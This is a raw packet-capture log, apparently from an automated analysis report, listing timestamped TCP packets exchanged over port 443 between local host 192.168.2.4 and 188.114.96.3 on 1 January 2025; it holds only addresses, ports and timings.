                                                          Jan 1, 2025 17:10:05.513026953 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.513250113 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.513314962 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.513348103 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.513353109 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.513381958 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.513464928 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.513951063 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.513987064 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.514017105 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.514023066 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.514049053 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.514286995 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.514326096 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.514353991 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.514358997 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.514386892 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.561398983 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.561469078 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.561508894 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.561523914 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.561562061 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.561650991 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.561717033 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.561753035 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.561758995 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.561785936 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.561953068 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.561971903 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.562010050 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.562017918 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.562052011 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.563467026 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.563481092 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.563590050 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.563597918 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.603178024 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.603197098 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.603447914 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.603457928 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.603517056 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.603574038 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.603585005 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.603590012 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.603648901 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.603648901 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.603957891 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604001999 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604032993 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.604038000 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604070902 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.604314089 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.604543924 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604630947 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604670048 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.604675055 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604716063 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.604724884 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604762077 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.604768991 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.604789972 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.651812077 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.651830912 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.651937962 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.651937962 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.651957035 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.652139902 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.652196884 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.652230978 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.652267933 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.652273893 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.652303934 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.652530909 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.652620077 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.652657986 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.652688980 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.652693033 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.652721882 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.693515062 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.693532944 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.693763018 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.693802118 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.693814039 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.693850040 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.693880081 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.693914890 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.693921089 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.693949938 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.694010973 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694042921 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.694051027 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694078922 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.694349051 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694382906 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694386005 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.694395065 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694416046 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.694883108 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694897890 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694924116 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.694933891 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.694946051 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.694960117 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.695341110 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.695354939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.695382118 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.695393085 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.695422888 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.695422888 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.697431087 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.697520971 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.742593050 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.742611885 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.742708921 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.742708921 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.742722988 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.742769003 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.742908001 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.742924929 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.743045092 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.743052006 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.743180990 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.743304968 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.743328094 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.743364096 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.743370056 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.743397951 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.743500948 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.784315109 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.784334898 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.784413099 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.784431934 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.784446955 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.784588099 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.784603119 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.784609079 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.784621954 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.784693003 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.785089016 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.785104036 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.785201073 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.785209894 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.785382032 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.785397053 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.785473108 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.785473108 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.785485983 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.785938978 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.785953045 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.786037922 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.786037922 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.786046982 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.786134005 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.834693909 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.834711075 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.834800005 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.834800005 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.834810019 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.835046053 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.835128069 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.835143089 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.835222006 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.835230112 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.835853100 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.835871935 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.835911989 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.835918903 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.835947037 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.835978985 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.837080002 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.837122917 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.837162018 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.837167978 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.837196112 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.837250948 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.877984047 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878010988 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878093958 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878093958 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878103971 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878117085 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878154039 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878165960 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878170013 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878197908 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878238916 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878257990 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878272057 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878302097 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878340006 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878340006 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878348112 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878376007 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878587961 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878628016 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878645897 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878662109 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878667116 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878679037 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878695965 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878695965 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878704071 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878772974 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878778934 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878840923 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.878884077 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.878953934 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.923839092 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.923860073 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924097061 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.924109936 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924149036 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924184084 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.924187899 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924201965 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924228907 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.924345970 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924393892 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.924401045 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924426079 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.924448967 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924479008 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.924777985 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.924784899 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.925518036 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.925653934 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.925661087 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.965471983 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.965662956 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.965702057 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.965707064 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.965723038 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.965734005 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966065884 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966070890 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966089964 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966118097 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966155052 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966162920 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966176033 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966193914 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966239929 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966247082 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966398954 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966610909 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966628075 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966703892 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966703892 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966712952 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966749907 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966777086 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966783047 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966813087 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966844082 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966849089 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966877937 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.966942072 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.966975927 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.967005968 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.967012882 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.967072964 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.967272043 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.967279911 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.967432022 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.967542887 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.967572927 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:05.967580080 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:05.967711926 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.019661903 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.019782066 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.019823074 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.019823074 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.019836903 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.019856930 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.019942999 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.019987106 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.019993067 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.020023108 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.020025015 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.020066023 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.020070076 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.020102978 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.020215034 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.020261049 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.020267963 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.020292997 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.056041002 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056086063 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056121111 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.056134939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056255102 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.056546926 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056596041 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056628942 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.056636095 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056667089 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.056824923 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056838989 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.056844950 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056868076 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.056901932 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.057013035 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.057013035 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.057018995 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057358027 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057374001 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057465076 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057495117 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.057503939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057533026 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.057596922 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057725906 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.057733059 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057969093 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.057987928 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.058032990 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.058039904 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.058065891 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.058162928 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.058197975 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.058228016 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.058234930 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.058264017 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.058286905 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.114253044 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114330053 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114362955 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.114375114 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114386082 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114418983 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.114427090 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114458084 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.114784956 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114804983 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114870071 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.114988089 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.115020990 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.115031004 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:06.115060091 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:06.115119934 CET49733443192.168.2.4188.114.96.3
